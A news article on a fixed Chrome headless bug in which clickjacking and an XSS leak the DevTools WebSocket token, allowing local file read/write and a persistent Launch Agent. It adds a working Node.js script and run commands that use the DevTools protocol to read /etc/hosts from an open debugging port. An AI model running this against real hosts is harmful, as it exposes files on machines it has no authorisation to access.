A now-fixed bug in Chrome allowed attackers to read and write local files and install malicious scripts on devices running the browser’s headless interface, researchers at Contrast Security have discovered.
Since 2017, Chrome has included a headless mode that allows developers to run an instance of the browser without launching the user interface.
The headless browser can be controlled programmatically and debugged remotely, and is intended for testing web applications and webpage functionality without human interaction.
In a proof-of-concept video, Contrast Security’s Matt Austin showed that by using a malicious HTML file stored locally on the device running the headless browser, an attacker can read the contents of sensitive files and write arbitrary files to the device’s hard drive.
From clickjacking to remote code execution
According to a discussion thread on the Chromium bug tracker, an attacker can exploit the bug only if the target machine is running headless Chrome in debugging mode (that is, started with the --remote-debugging-port flag).
Debugging mode enables the DevTools protocol, which allows developers to connect remotely to a running instance of Chrome and perform tasks such as inspecting, profiling, and instrumenting it.
The exploit works in several steps. The malicious HTML file contains an invisible iframe placed on top of a button in the page, the classic clickjacking setup: the user believes they are clicking the button, but the click lands in the iframe.
The iframe’s source is set to the discovery page of the headless browser’s debugging endpoint. When the user clicks, the iframe invisibly navigates to the Chrome DevTools front end, with the WebSocket token passed in the URL.
Next, a second iframe is created in the exploit page. It uses a cross-site scripting (XSS) vector in the Chrome DevTools page to set the href of the page’s parent frame and of the clickjacking frame to the same origin, which lets the exploit page circumvent the same-origin policy.
The WebSocket token is then passed to the exploit page, which uses it to connect to Chrome’s remote debugging protocol. From there, the exploit page can read local files and write arbitrary files on the target device.
In the PoC video, the attacker writes a malicious Launch Agent to the target device. On macOS, a Launch Agent is a launchd configuration that runs a program automatically whenever the user logs in, which turns the arbitrary file write into persistent code execution.
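The last stage of the attack described above, as an added example that is not Contrast Security’s PoC and not Chromium code: once a page holds the WebSocket debugger URL (the “token”), the DevTools protocol alone is enough to read local files. The clickjacking and XSS stages that leak the token are not reproduced here, since the article does not give enough detail to do so and the bug is fixed. Assumptions not taken from the article: headless Chrome was started with --remote-debugging-port on localhost, the port is supplied in a hypothetical CDP_PORT environment variable, the file read back is file:///etc/hosts, and Node 22 or later is used for its built-in fetch and WebSocket. The methods used (Page.enable, Page.navigate, the Page.loadEventFired event, Runtime.evaluate) are documented DevTools Protocol methods, and http://localhost:<port>/json is the discovery endpoint that lists targets and their webSocketDebuggerUrl values.

```javascript
// Added example (not Contrast Security's PoC, not Chromium code): what a page can
// do with Chrome's remote debugging endpoint once it holds the WebSocket URL.
// Assumptions (not from the article): headless Chrome runs with
// --remote-debugging-port=<port> on localhost, the port comes from CDP_PORT
// (a hypothetical variable name), and the file read back is file:///etc/hosts.
// Needs Node 22+ for the global fetch and WebSocket.

// The discovery endpoint http://localhost:<port>/json lists debug targets; each
// "page" target carries a webSocketDebuggerUrl. That URL is all a caller needs.
function pickPageTarget(targets) {
  const page = targets.find(
    (t) => t.type === 'page' && typeof t.webSocketDebuggerUrl === 'string'
  );
  if (!page) throw new Error('discovery endpoint exposes no page target');
  return page.webSocketDebuggerUrl;
}

// DevTools protocol frames are JSON objects with an id, a method and params.
function cdpMessage(id, method, params = {}) {
  return JSON.stringify({ id, method, params });
}

// Pull the value out of a Runtime.evaluate reply, surfacing protocol errors and
// in-page exceptions instead of silently returning undefined.
function extractValue(reply) {
  if (reply.error) {
    throw new Error(`CDP error ${reply.error.code}: ${reply.error.message}`);
  }
  if (reply.result && reply.result.exceptionDetails) {
    throw new Error(`evaluate threw: ${reply.result.exceptionDetails.text}`);
  }
  return reply.result.result.value;
}

// Open the debugger socket, navigate the target to a file:// URL and read the
// rendered text back. Chrome renders a local text file into the document body,
// so innerText is the file's contents.
async function readLocalFile(wsUrl, fileUrl) {
  const ws = new WebSocket(wsUrl);
  await new Promise((resolve, reject) => {
    ws.onopen = resolve;
    ws.onerror = () => reject(new Error(`cannot connect to ${wsUrl}`));
  });

  let nextId = 1;
  const pending = new Map(); // id -> resolver for in-flight commands
  let loadFired;
  const loaded = new Promise((resolve) => { loadFired = resolve; });

  ws.onmessage = (event) => {
    const msg = JSON.parse(event.data);
    if (msg.id !== undefined && pending.has(msg.id)) {
      pending.get(msg.id)(msg);        // reply to a command we sent
      pending.delete(msg.id);
    } else if (msg.method === 'Page.loadEventFired') {
      loadFired();                     // navigation finished
    }
  };

  const send = (method, params) =>
    new Promise((resolve) => {
      const id = nextId++;
      pending.set(id, resolve);
      ws.send(cdpMessage(id, method, params));
    });

  await send('Page.enable');                         // subscribe to page events
  await send('Page.navigate', { url: fileUrl });     // point the tab at a local file
  await loaded;                                      // wait for it to load
  const reply = await send('Runtime.evaluate', {
    expression: 'document.documentElement.innerText',
    returnByValue: true,
  });
  ws.close();
  return extractValue(reply);
}

// Live run only when CDP_PORT is set, so the helpers above can be used offline.
if (process.env.CDP_PORT) {
  const base = `http://localhost:${process.env.CDP_PORT}`;
  fetch(`${base}/json`)
    .then((res) => res.json())
    .then((targets) => readLocalFile(pickPageTarget(targets), 'file:///etc/hosts'))
    .then((text) => console.log(text))
    .catch((err) => { console.error(err.message); process.exitCode = 1; });
}
```

To try it, start a throwaway instance with `chrome --headless --remote-debugging-port=9222 about:blank`, then run `CDP_PORT=9222 node read.js`; the script prints the contents of /etc/hosts. No credential is checked at any point, which is why leaking the WebSocket URL to an attacker-controlled page is equivalent to handing over the local file system. The same fetch of /json is also a quick check a defender can run to see whether a developer machine or CI host has a debugging port reachable at all.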
High-severity bug
The bug, reported in July, was rated high severity and has been fixed in the latest version of Chromium.
To block the exploit, Chromium was patched so that the DevTools discovery page can no longer be embedded in an iframe.
The discovery page has also been deprecated, and developers are advised to use chrome://inspect instead.
The researchers who reported the bug were awarded a $3,000 bounty by the Google VRP panel.